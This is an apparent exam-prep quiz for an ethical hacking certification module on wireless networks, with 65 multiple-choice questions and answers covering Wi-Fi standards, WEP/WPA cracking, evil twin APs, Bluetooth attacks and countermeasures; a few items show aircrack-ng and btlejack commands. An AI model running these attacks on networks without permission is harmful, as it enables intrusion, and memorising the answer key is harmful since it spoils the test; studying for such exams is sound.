Module 16 - Hacking Wireless Networks ( EC Mode )

Question 1

Which of the following technologies serves as an air interface for 4G and 5G broadband wireless communications?

A. OFDM
B. DSSS
C. FHSS
D. MIMO-OFDM

Answer 1

Answer: D. MIMO-OFDM

Question 2

Which of the following is a communication standard that is also known as WiMAX and is designed to provide multiple physical layer (PHY) and MAC options?

A. 802.11n
B. 802.16
C. 802.11g
D. 802.15.1

Answer 2

Answer:
B. 802.16

Question 3

Which of the following wireless standards uses modulation schemes such as GFSK, π/4-DPSK, and 8DPSK and a frequency of 2.4 GHz with data transfer rates in the range of 25–50 Mbps?

A. 802.16 (WiMAX)
B. 802.11a
C. 802.11g
D. 802.15.1 (Bluetooth)

Answer 3

Answer:
D. 802.15.1 (Bluetooth)

Question 4

Which type of antenna is commonly used in wireless communication?

A. Parabolic
B. Omnidirectional
C. Bidirectional
D. Unidirectional

Answer 4

Answer:
B. Omnidirectional

Question 5

What technology is used to connect wireless devices to a wireless/wired network?

A. Hotspot
B. Bandwidth
C. Access point (AP)
D. Association

Answer 5

Answer:
C. Access point (AP)

Question 6

In which authentication process do the station and access point use the same WEP key to provide authentication, which means that this key should be enabled and configured manually on both the access point and the client?

A. Shared key authentication process
B. Open-system authentication process
C. WEP encryption
D. WPA encryption

Answer 6

Answer:
A. Shared key authentication process

Question 7

Which of the following is considered a token used to identify a 802.11 (Wi-Fi) network, which is by default part of the frame header sent over a wireless local area network (WLAN)?

A. Association
B. SSID
C. Hotspot
D. Access point

Answer 7

Answer:
B. SSID

Question 8

Which of the following is considered as the method of transmitting radio signals by rapidly switching a carrier among many frequency channels?

A. Multiple input, multiple output orthogonal frequency-division multiplexing (MIMO-OFDM)
B. Direct-sequence Spread Spectrum (DSSS)
C. Frequency-hopping Spread Spectrum (FHSS)
D. Orthogonal Frequency-division Multiplexing (OFDM)

Answer 8

Answer:
C. Frequency-hopping Spread Spectrum (FHSS)

Question 9

Which of the following wireless technologies involves multiplying the original data signal with a pseudo-random noise spreading code?

A. Frequency-hopping Spread Spectrum (FHSS)
B. Direct-sequence Spread Spectrum (DSSS)
C. Multiple input, multiple output orthogonal frequency-division multiplexing (MIMO-OFDM)
D. Orthogonal Frequency-division Multiplexing (OFDM)

Answer 9

Answer:
B. Direct-sequence Spread Spectrum (DSSS)

Question 10

Which of the following is a standard for Wireless Local Area Networks (WLANs) that provides improved encryption for networks that use 802.11a, 802.11b, and 802.11g standards?

A. 802.11n
B. 802.11i
C. 802.11e
D. 802.11d

Answer 10

Answer:
B. 802.11i

Question 11

Which of the following terms describes the amount of information that may be broadcast over a connection?

A. Bandwidth
B. ISM band
C. BSSID
D. Hotspot

Answer 11

Answer:
A. Bandwidth

Question 12

In LAN-to-LAN Wireless Network, do the APs provide wireless connectivity to local computers, and computers on different networks that can be interconnected?

A. True
B. False

Answer 12

Answer:
True

Question 13

Which of the following Wi-Fi security protocols uses GCMP-256 for encryption and HMAC-SHA-384 for authentication?

A. CCMP
B. WPA3
C. PEAP
D. WEP

Answer 13

Answer:
B. WPA3

Question 14

Which of the following encryption methods has KRACK vulnerabilities that make it susceptible to packet sniffing, connection hijacking, malware injection, and decryption attacks?

A. WPA2
B. EAP
C. WPA
D. WEP

Answer 14

Answer:
A. WPA2

Question 15

Which of the following encryption methods does WPA2 use for wireless data encryption, and at which encryption level?

A. 128 bit and TKIP
B. 64 bit and CCMP
C. 128 bit and CCMP
D. 128 bit and CRC

Answer 15

Answer:
C. 128 bit and CCMP

Question 16

Which of the following cryptographic algorithms is used by CCMP?

A. DES
B. RC4
C. TKIP
D. AES

Answer 16

Answer:
D. AES

Question 17

Donald works as a network administrator with ABCSecurity, Inc., a small IT based firm in San Francisco. He was asked to set up a wireless network in the company premises which provides strong encryption to protect the wireless network against attacks. After doing some research, Donald decided to use a wireless security protocol which has the following features:

Provides stronger data protection and network access control
Uses AES encryption algorithm for strong wireless encryption
Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP)
Which of the following wireless security protocol did Donald decide to use?

A. WEP
B. TKIP
C. WPA
D. WPA2

Answer 17

Answer:
D. WPA2

Question 18

Which of the following encryption techniques is used in WPA?

A. RSA
B. DES
C. TKIP
D. AES

Answer 18

Answer:
C. TKIP

Question 19

Which of the following wireless security protocols does not provide cryptographic integrity protection?

A. WEP
B. WPA2
C. TKIP
D. WPA

Answer 19

Answer:
A. WEP

Question 20

Which of the following protocols encapsulates the EAP within an encrypted and authenticated Transport Layer Security (TLS) tunnel?

A. PEAP
B. CCMP
C. RADIUS
D. LEAP

Answer 20

Answer:
A. PEAP

Question 21

Which of the following wireless security protocols consists of 40/104 bit encryption key length?

A. WEP
B. RSA
C. WPA2
D. WPA

Answer 21

Answer:
A. WEP

Question 22

Which of the following wireless security protocols includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)?

A. WEP
B. TKIP
C. WPA2
D. WPA

Answer 22

Answer:
C. WPA2

Question 23

Which of the following attack techniques is used by an attacker to send forged control, management, or data frames over a wireless network to misdirect wireless devices and perform other types of attacks such as DoS?

A. Availability attack
B. Integrity attack
C. Confidentiality attack
D. Authentication attack

Answer 23

Answer:
B. Integrity attack

Question 24

Which of the following is a type of access-control attack in which an attacker uses any USB adapter or wireless card and connects a host to an unsecured client to attack a specific client or to avoid AP security?

A. Ad hoc association
B. Promiscuous client
C. Unauthorized association
D. Client mis-association

Answer 24

Answer:
A. Ad hoc association

Question 25

In which of the following types of attack does an attacker exploit the carrier-sense multiple access with collision avoidance (CSMA/CA) clear channel assessment (CCA) mechanism to make a channel appear busy?

A. Beacon flood
B. EAP failure
C. Access point theft
D. Denial of service

Answer 25

Answer:
D. Denial of service

Question 26

In which of the following attacks does an attacker exploit dynamic routing protocols, such as DSR and AODV, and place themselves strategically in a target network to sniff and record ongoing wireless transmissions?

A. Wormhole attack
B. Honeypot AP attack
C. Sinkhole attack
D. RADIUS replay

Answer 26

Answer:
A. Wormhole attack

Question 27

John is a pen tester working with an information security consultant based in Paris. As part of a penetration testing assignment, he was asked to perform wireless penetration testing for a large MNC. John knows that the company provides free Wi-Fi access to its employees on the company premises. He sets up a rogue wireless access point with the same SSID as that of the company’s Wi-Fi network just outside the company premises. He sets up this rogue access point using the tools that he has and hopes that the employees might connect to it. What type of wireless confidentiality attack is John trying to do?

A. KRACK Attack
B. War Driving
C. WEP Cracking
D. Evil Twin AP

Answer 27

Answer:
D. Evil Twin AP

Question 28

Posing as an authorized AP by beaconing the WLAN’s service set identifier (SSID) to lure users is known as __________.

A. Evil Twin AP
B. Honeypot AP
C. Man-in-the-Middle Attack
D. Masquerading

Answer 28

Answer:
A. Evil Twin AP

Question 29

Steven, a wireless network administrator, has just finished setting up his company’s wireless network. He has enabled various security features such as changing the default SSID and enabling strong encryption on the company’s wireless router. Steven decides to test the wireless network for confidentiality attacks to check whether an attacker can intercept information sent over wireless associations, whether sent in clear text or encrypted by Wi-Fi protocols. As a part of testing, he tries to capture and decode unprotected application traffic to obtain potentially sensitive information using hardware or software tools such as Ettercap, Kismet, Wireshark, etc. What type of wireless confidentiality attack is Steven trying to do?

A. Masquerading
B. Eavesdropping
C. WEP Key Cracking
D. Evil Twin AP

Answer 29

Answer:
B. Eavesdropping

Question 30

Which of the following attacks is an inter-chip privilege escalation attack, where an attacker exploits the underlying vulnerabilities in wireless chips that handle wireless communications such as Bluetooth and Wi-Fi?

A. Evil twin
B. Wireless co-existence attack
C. aLTEr attack
D. AP MAC spoofing

Answer 30

Answer:
B. Wireless co-existence attack

Question 31

In a GNSS spoofing technique, attackers track the receiver’s position and identify the deviation from the original location to a fake one. Identify this technique.

A. Interrupting the lock mechanism
B. Cancellation methodology
C. Meaconing method
D. Drag-off strategy

Answer 31

Answer:
D. Drag-off strategy

Question 32

In which of the following techniques does an attacker draw symbols in public places to advertise open Wi-Fi networks?

A. Wardriving
B. Warwalking
C. Warflying
D. Warchalking

Answer 32

Answer:
D. Warchalking

Question 33

Which of the following tools is designed to capture a WPA/WPA2 handshake and act as an ad-hoc AP?

A. Airbase-ng
B. Airolib-ng
C. Airmon-ng
D. Airodump-ng

Answer 33

Answer:
A. Airbase-ng

Question 34

Which of the following tools is used by an attacker to create rogue APs and perform sniffing and MITM attacks?

A. Halberd
B. MANA Toolkit
C. Gobuster
D. Skyhook

Answer 34

Answer:
B. MANA Toolkit

Question 35

Which tool would be used to collect wireless packet data?

A. NetStumbler
B. Netcat
C. Nessus
D. John the Ripper

Answer 35

Answer:
A. NetStumbler

Question 36

There is a WEP encrypted wireless AP with no clients connected. In order to crack the WEP key, a fake authentication needs to be performed. Which of the following steps need to be performed by the attacker for generating fake authentication?

A. Set the wireless interface to monitor mode
B. Ensure association of source MAC address with the AP
C. Use cracking tools
D. Capture the IVs

Answer 36

Answer:
B. Ensure association of source MAC address with the AP

Question 37

Kenneth, a professional penetration tester, was hired by the XYZ Company to conduct wireless network penetration testing. Kenneth proceeds with the standard steps of wireless penetration testing. He tries to collect lots of initialization vectors (IVs) using the injection method to crack the WEP key. He uses the aircrack-ng tool to capture the IVs from a specific AP. Which of the following aircrack-ng commands will help Kenneth to do this?

A. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
B. airodump-ng -c 9 – bssid 00:14:6C:7E:40:80 -w output ath0
C. airmon-ng start wifi0 9
D. aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Answer 37

Answer:
B. airodump-ng -c 9 – bssid 00:14:6C:7E:40:80 -w output ath0

Question 38

Andrew, a professional penetration tester, was hired by ABC Security, Inc., a small IT-based firm in the United States to conduct a test of the company’s wireless network. During the information-gathering process, Andrew discovers that the company is using the 802.11 g wireless standard. Using the NetSurveyor Wi-Fi network discovery tool, Andrew starts gathering information about wireless APs. After trying several times, he is not able to detect a single AP. What do you think is the reason behind this?

A. MAC address filtering feature must be disabled on APs or router.
B. SSID broadcast feature must be disabled, so APs cannot be detected.
C. Andrew must be doing something wrong, as there is no reason for him to not detect access points.
D. NetSurveyor does not work against 802.11g.

Answer 38

Answer: B. SSID broadcast feature must be disabled, so APs cannot be detected.

Question 39

Which of the following tools helps attackers identify networks by passively collecting packets and detecting standard named networks, hidden networks, and the presence of non-beaconing networks via data traffic?

A. Robber
B. L0phtCrack
C. Kismet
D. Netcraft

Answer 39

Answer: C. Kismet

Question 40

Mark is working as a penetration tester in InfoSEC, Inc. One day, he notices that the traffic on the internal wireless router suddenly increases by more than 50%. He knows that the company is using a wireless 802.11 a/b/g/n/ac network. He decided to capture live packets and browse the traffic to investigate the issue to find out the actual cause. Which of the following tools should Mark use to monitor the wireless network?

A. CommView for Wi-Fi
B. WiFish Finder
C. BlueScan
D. WiFiFoFum

Answer 40

Answer: A. CommView for Wi-Fi

Question 41

Which of the following is a portable RFID cloning device that can be used by attackers to clone RFID tags?

A. KeyGrabber
B. PCB-2040 Jammer
C. Hardware Protocol Analyzer
D. iCopy-X

Answer 41

Answer: D. iCopy-X

Question 42

Which of the following security standards contains the Dragonblood vulnerabilities that help attackers recover keys, downgrade security mechanisms, and launch various information-theft attacks?

A. WPA2
B. WEP
C. WPA
D. WPA3

Answer 42

Answer: D. WPA3

Question 43

During a wireless penetration test, a tester detects an AP using the WPA2 encryption. Which of the following attacks should be used to obtain the key?

A. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
B. The tester must capture the WPA2 authentication handshake and then crack it.
C. The tester must use the tool inSSIDer to crack it using the ESSID of the network.
D. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key.

Answer 43

Answer: B. The tester must capture the WPA2 authentication handshake and then crack it.

Question 44

Which of the following techniques involves sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones and laptops?

A. Bluejacking
B. Bluesmacking
C. BluePrinting
D. Bluebugging

Answer 44

Answer: A. Bluejacking

Question 45

Fill in the blank.

_________ is the art of collecting information about Bluetooth enabled devices such as manufacturer, device model and firmware version.

A. BlueSniff
B. BluePrinting
C. Bluebugging
D. Bluejacking

Answer 45

Answer: B. BluePrinting

Question 46

Thomas is a cyber thief trying to hack Bluetooth-enabled devices at public places. He decided to hack Bluetooth-enabled devices by using a DoS attack. He started sending an oversized ping packet to a victim’s device, causing a buffer overflow and finally succeeded. What type of Bluetooth device attack is Thomas most likely performing?

A. Bluesnarfing
B. Bluejacking
C. Bluesmacking
D. Bluebugging

Answer 46

Answer: C. Bluesmacking

Question 47

Which of the following terms is used to describe an attack in which an attacker gains remote access to a target Bluetooth-enabled device without the victim being aware of it?

A. Bluesnarfing
B. Bluesmacking
C. Bluebugging
D. Bluejacking

Answer 47

Answer: C. Bluebugging

Question 48

An attacker collects the make and model of target Bluetooth-enabled devices and analyzes them in an attempt to find out whether the devices are in the range of vulnerability to exploit. Identify which type of attack is performed on Bluetooth devices.

A. BlueSniff
B. MAC Spoofing Attack
C. BluePrinting
D. Bluebugging

Answer 48

Answer: C. BluePrinting

Question 49

In which of the following Bluetooth threats does an attacker trick Bluetooth users into lowering security or disabling authentication for Bluetooth connections to pair with them and steal information?

A. Bugging devices
B. Protocol exploitation
C. Malicious code
D. Social engineering

Answer 49

Answer: D. Social engineering

Question 50

Which of the following btlejack commands allows an attacker to sniff new Bluetooth low-energy connections?

A. btlejack -c any
B. btlejack -f 0x129f3244 -j
C. btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
D. btlejack -s

Answer 50

Answer: A. btlejack -c any

Question 51

Which of the following Bluetooth modes prevents a device from appearing on a device list during a Bluetooth-enabled device search process but remains visible to users and devices that were previously paired with it?

A. Limited discoverable mode
B. Discoverable mode
C. Non-pairable mode
D. Non-discoverable mode

Answer 51

Answer: D. Non-discoverable mode

Question 52

Which of the following protocols is used by BlueJacking to send anonymous messages to other Bluetooth-equipped devices?

A. SDP
B. LMP
C. OBEX
D. L2CAP

Answer 52

Answer: C. OBEX

Question 53

An attacker collects the make and model of target Bluetooth-enabled devices and analyzes them in an attempt to find out whether the devices are in the range of vulnerability to exploit. Identify which type of attack is performed on Bluetooth devices.

A. MAC Spoofing Attack
B. BlueSniff
C. BluePrinting
D. Bluebugging

Answer 53

Answer: C. BluePrinting

Question 54

Which of the following countermeasures helps in defending against Bluetooth hacking?

A. Check the wireless devices for configuration or setup problems regularly.
B. Use non-regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential on the keypad.
C. Place a firewall or packet filter between the AP and the corporate intranet.
D. Implement an additional technique for encrypting traffic, such as IPSEC over wireless.

Answer 54

Answer: B. Use non-regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential on the keypad.

Question 55

Which of the following practices makes an organization’s wireless network vulnerable to aLTEr attacks?

A. Encrypt DNS queries and use only trusted DNS resolvers.
B. Access only websites having HTTPS connections.
C. Use DNS over Transport Layer Security (TLS) or DNS over datagram TLS (DTLS) to encrypt DNS traffic and for integrity protection.
D. Do not use a virtual network tunnel with integrity protection and endpoint authentication.

Answer 55

Answer: D. Do not use a virtual network tunnel with integrity protection and endpoint authentication.

Question 56

Which of the following practices helps manufacturers protect their devices against GNSS spoofing attacks?

A. Do not correlate the GNSS timing with other timing sources such as inertial measurement units (IMUs).
B. Avoid deploying GNSS cryptographic methods such as spreading code encryption (SCE).
C. Deploy defensive devices such as antennae and radio spectra against software attacks.
D. Never deploy spatial-based processing with space-time adaptive processing (STAP).

Answer 56

Answer: C. Deploy defensive devices such as antennae and radio spectra against software attacks.

Question 57

Which of the following practices makes an organization’s wireless environment vulnerable to various attacks?

A. Enable Simple Network Management Protocol (SNMP).
B. Enable MAC address filtering on APs or routers.
C. Set the router access password and enable firewall protection.
D. Disable the Dynamic Host Configuration Protocol (DHCP) and rely on static IP addresses.

Answer 57

Answer: A. Enable Simple Network Management Protocol (SNMP).

Question 58

Which of the following practices help security professionals in defending their network against wireless attacks?

A. Never place a firewall or packet filter between an AP and the corporate Intranet.
B. Modify the SSID with some unique characters and strings.
C. Do not limit the strength of the wireless network so that it can be detected outside the bounds of the organization.
D. Avoid using SSID cloaking.

Answer 58

Answer: B. Modify the SSID with some unique characters and strings.

Question 59

Which of the following is to be used to keep certain default wireless messages from broadcasting the ID to everyone?

A. Bluejacking
B. Bluesmacking
C. MAC Spoofing
D. SSID Cloaking

Answer 59

Answer: D. SSID Cloaking

Question 60

Which of the following techniques is used by network management software to detect rogue APs?

A. Virtual-private network
B. AP scanning
C. Wired side inputs
D. RF scanning

Answer 60

Answer: C. Wired side inputs

Question 61

Which of the following components of Cisco’s WIPS deployment forwards attack information from wireless IPS monitor-mode APs to the MSE and distributes configuration parameters to APs?

A. Mobility services engine
B. Wireless LAN controller
C. Local mode AP
D. Wireless control system

Answer 61

Answer: B. Wireless LAN controller

Question 62

Which of the following practices makes the Bluetooth-enabled devices of an organization vulnerable to various attacks?

A. Use link encryption for all Bluetooth connections.
B. Change the default settings of the Bluetooth-enabled device to the best security standard.
C. Avoid sharing sensitive information over Bluetooth-enabled devices.
D. Always grant Bluetooth access permission to applications.

Answer 62

Answer: D. Always grant Bluetooth access permission to applications.

Question 63

Which of the following practices is NOT a preventive measure against KRACK attacks?

A. Avoid using public Wi-Fi networks
B. Enable two-factor authentication
C. Turn off auto updates for all wireless devices
D. Always enable the HTTPS Everywhere extension

Answer 63

Answer: C. Turn off auto updates for all wireless devices

Question 64

Which of the following countermeasures helps in defending against Bluetooth hacking?

A. Use non-regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential on the keypad.
B. Place a firewall or packet filter between the AP and the corporate intranet.
C. Check the wireless devices for configuration or setup problems regularly.
D. Implement an additional technique for encrypting traffic, such as IPSEC over wireless.

Answer 64

Answer: A. Use non-regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential on the keypad.

Question 65

Which of the following practices assists security professionals in defending a wireless network against KRACK attacks?

A. Allow using public Wi-Fi networks.
B. Access sensitive resources when the device is connected to an unprotected network.
C. Turn off auto updates for all the wireless devices.
D. Employ the EAPOL-key replay counter to ensure that the AP recognizes only the latest counter value.

Answer 65

Answer: D. Employ the EAPOL-key replay counter to ensure that the AP recognizes only the latest counter value.